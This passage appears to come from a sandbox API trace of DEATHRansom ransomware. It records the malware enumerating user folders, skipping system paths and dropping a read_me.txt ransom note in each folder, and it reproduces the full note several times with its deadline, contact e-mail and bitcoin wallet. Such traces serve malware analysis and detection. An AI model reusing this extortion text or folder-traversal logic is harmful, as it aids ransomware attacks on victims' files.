pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned 42 [0075.924] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0075.924] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0075.924] StrStrW (lpFirst="searches", lpSrch="programdata") returned 0x0 [0075.924] StrStrW (lpFirst="searches", lpSrch="$recycle.bin") returned 0x0 [0075.925] StrStrW (lpFirst="searches", lpSrch="program files") returned 0x0 [0075.925] StrStrW (lpFirst="searches", lpSrch="windows") returned 0x0 [0075.925] StrStrW (lpFirst="searches", lpSrch="all users") returned 0x0 [0075.925] StrStrW (lpFirst="searches", lpSrch="appdata") returned 0x0 [0075.925] GetProcessHeap () returned 0x4f10000 [0075.925] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b10090 [0075.925] lstrcpyW (in: lpString1=0x8b10090, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0075.925] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 83 [0075.925] QueueUserWorkItem (Function=0x40a710, Context=0x8b10090, Flags=0x0) returned 1 [0075.925] GetProcessHeap () returned 0x4f10000 [0075.925] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8dc10f0 [0075.925] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*") returned 44 [0075.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.925] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\.") returned 44 [0075.925] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.925] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.925] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.925] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\..") returned 45 [0075.925] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.925] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.925] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 54 [0075.925] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0075.925] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 63 [0075.925] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0075.925] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 70 [0075.925] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0075.925] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.926] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\read_me.txt") returned 54 [0075.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.926] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.926] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.927] CloseHandle (hObject=0x7a0) returned 1 [0075.927] GetProcessHeap () returned 0x4f10000 [0075.927] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8dc10f0 | out: hHeap=0x4f10000) returned 1 [0075.927] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="SendTo", cAlternateFileName="")) returned 1 [0075.927] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned 40 [0075.927] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0075.927] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0075.927] StrStrW (lpFirst="sendto", lpSrch="programdata") returned 0x0 [0075.927] StrStrW (lpFirst="sendto", lpSrch="$recycle.bin") returned 0x0 [0075.927] StrStrW (lpFirst="sendto", lpSrch="program files") returned 0x0 [0075.927] StrStrW (lpFirst="sendto", lpSrch="windows") returned 0x0 [0075.927] StrStrW (lpFirst="sendto", lpSrch="all users") returned 0x0 [0075.927] StrStrW (lpFirst="sendto", lpSrch="appdata") returned 0x0 [0075.927] GetProcessHeap () returned 0x4f10000 [0075.927] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8dc10f0 [0075.927] lstrcpyW (in: lpString1=0x8dc10f0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0075.927] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 84 [0075.927] QueueUserWorkItem (Function=0x40a710, Context=0x8dc10f0, Flags=0x0) returned 1 [0075.927] GetProcessHeap () returned 0x4f10000 [0075.927] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8dd10f8 [0075.928] wnsprintfW (in: pszDest=0x8dd10f8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*") returned 42 [0075.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0075.928] wnsprintfW (in: pszDest=0x8dd10f8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\read_me.txt") returned 52 [0075.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0075.955] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.955] WriteFile (in: hFile=0x7a4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.956] CloseHandle (hObject=0x7a4) returned 1 [0075.956] GetProcessHeap () returned 0x4f10000 [0075.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8dd10f8 | out: hHeap=0x4f10000) returned 1 [0075.957] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0075.957] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned 44 [0075.957] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0075.957] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0075.957] StrStrW (lpFirst="start menu", lpSrch="programdata") returned 0x0 [0075.957] StrStrW (lpFirst="start menu", lpSrch="$recycle.bin") returned 0x0 [0075.957] StrStrW (lpFirst="start menu", lpSrch="program files") returned 0x0 [0075.957] StrStrW (lpFirst="start menu", lpSrch="windows") returned 0x0 [0075.957] StrStrW (lpFirst="start menu", lpSrch="all users") returned 0x0 [0075.957] StrStrW (lpFirst="start menu", lpSrch="appdata") returned 0x0 [0075.957] GetProcessHeap () returned 0x4f10000 [0075.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b20098 [0075.957] lstrcpyW (in: lpString1=0x8b20098, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0075.957] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 85 [0075.957] QueueUserWorkItem (Function=0x40a710, Context=0x8b20098, Flags=0x0) returned 1 [0075.957] GetProcessHeap () returned 0x4f10000 [0075.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8dd10f8 [0075.957] wnsprintfW (in: pszDest=0x8dd10f8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*") returned 46 [0075.957] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="\x07")) returned 0xffffffff [0075.957] wnsprintfW (in: pszDest=0x8dd10f8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\read_me.txt") returned 56 [0075.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0075.958] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.958] WriteFile (in: hFile=0x7a4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.959] CloseHandle (hObject=0x7a4) returned 1 [0075.959] GetProcessHeap () returned 0x4f10000 [0075.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8dd10f8 | out: hHeap=0x4f10000) returned 1 [0075.959] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0075.960] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned 43 [0075.960] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0075.960] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0075.960] StrStrW (lpFirst="templates", lpSrch="programdata") returned 0x0 [0075.960] StrStrW (lpFirst="templates", lpSrch="$recycle.bin") returned 0x0 [0075.960] StrStrW (lpFirst="templates", lpSrch="program files") returned 0x0 [0075.960] StrStrW (lpFirst="templates", lpSrch="windows") returned 0x0 [0075.960] StrStrW (lpFirst="templates", lpSrch="all users") returned 0x0 [0075.960] StrStrW (lpFirst="templates", lpSrch="appdata") returned 0x0 [0075.960] GetProcessHeap () returned 0x4f10000 [0075.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8dd10f8 [0075.960] lstrcpyW (in: lpString1=0x8dd10f8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0075.960] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 86 [0075.960] QueueUserWorkItem (Function=0x40a710, Context=0x8dd10f8, Flags=0x0) returned 1 [0075.960] GetProcessHeap () returned 0x4f10000 [0075.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8de1100 [0075.960] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*") returned 45 [0075.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="\x07")) returned 0xffffffff [0075.960] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\read_me.txt") returned 55 [0075.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7fc [0075.972] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 